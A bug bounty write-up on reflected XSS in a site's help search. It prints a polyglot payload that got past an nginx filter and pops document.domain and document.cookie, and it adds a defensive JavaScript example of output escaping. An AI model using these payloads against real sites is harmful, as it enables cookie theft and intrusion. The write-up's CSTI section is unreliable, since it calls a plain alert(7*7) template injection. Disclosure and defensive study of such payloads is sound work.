Hi everyone, I'm Suryesh, a bug bounty hunter. In this write-up I'll explain reflected XSS, and I'll keep everything very simple. Please forgive any grammatical errors. So, let's get started.
What is Reflected XSS?
In this type of attack, the malicious script is not stored on the vulnerable website but is instead injected into the page by the attacker and reflected in the user's browser. Reflected XSS attacks are typically less severe than stored XSS attacks, as they only affect the user whom the attacker specifically targeted.
The script is reflected in a web browser, typically through URL parameters or forms, and executed immediately.
Example: An attacker crafts a URL with a malicious script that executes when the victim clicks the link.
CSTI:- Client-Side Template Injection (CSTI), also known as Client-Side Injection or JavaScript Template Injection, is a web vulnerability where an attacker injects malicious payloads into JavaScript template expressions on the client side. CSTI affects JavaScript templating engines running in the browser. This can lead to serious security issues, such as cross-site scripting (XSS), which may escalate to remote code execution (RCE) if the payload can influence server logic.
So now let's jump into our topic.
The target has a search feature on its help.target.com subdomain. Initially I started with basic XSS payloads and analysed the responses. All of my payloads were blocked by the nginx server; it returned 403 Forbidden for every basic payload. I didn't want to give up that easily, so I started using polyglot payloads, and one of them worked:
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(document.domain)//>
For Cookie:
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(document.cookie)//>
Now let's chain it into CSTI.
To chain it into CSTI we have to modify the payload into a CSTI payload. There are a lot of payloads available on GitHub that you can use.
So our payload is:
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(7*7)//>
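The situation above (basic payloads blocked with 403, the polyglot passing) comes down to filtering being applied to the input instead of encoding being applied at the point of reflection. The following is an added example, not code from the original write-up or the target: a minimal search-results renderer in its vulnerable and hardened forms, plus a naive blocklist of the kind a WAF rule might use. The helper names and page layout are assumptions.

```javascript
// The polyglot from the write-up, used here only as a test input.
const POLYGLOT = 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \\" onmouseover=/*<svg/*/onload=alert(document.domain)//>';

// Naive blocklist (assumed, for illustration): returns true = block.
// It catches the obvious payloads but knows nothing about the polyglot.
function naiveBlocklist(q) {
  return /<script|javascript:alert|onerror=/i.test(q);
}

// Vulnerable: the search term is concatenated straight into the HTML body.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

// Escape the five characters that matter in an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;'
  }[c]));
}

// Hardened: output encoding at the point of reflection, independent of any WAF.
function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Does a tag from the input survive into the page as real markup?
// (Text like "onload=" without a surrounding tag is inert in a text context.)
function containsInjectedTag(html) {
  return /<(svg|html|\/script)/i.test(html);
}
```

Running the polyglot through both renderers shows the blocklist passing it while the escaped output contains no live tag; that is the check to repeat on the real search endpoint before closing the finding.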
I reported this issue to them, but unfortunately they marked it as a duplicate of my own earlier report, because I had reported two XSS findings with the same payload.
I hope you learned something from this write-up. Don't forget to follow me on social media. Lastly, a video PoC is coming soon on our YouTube channel, so please subscribe as well.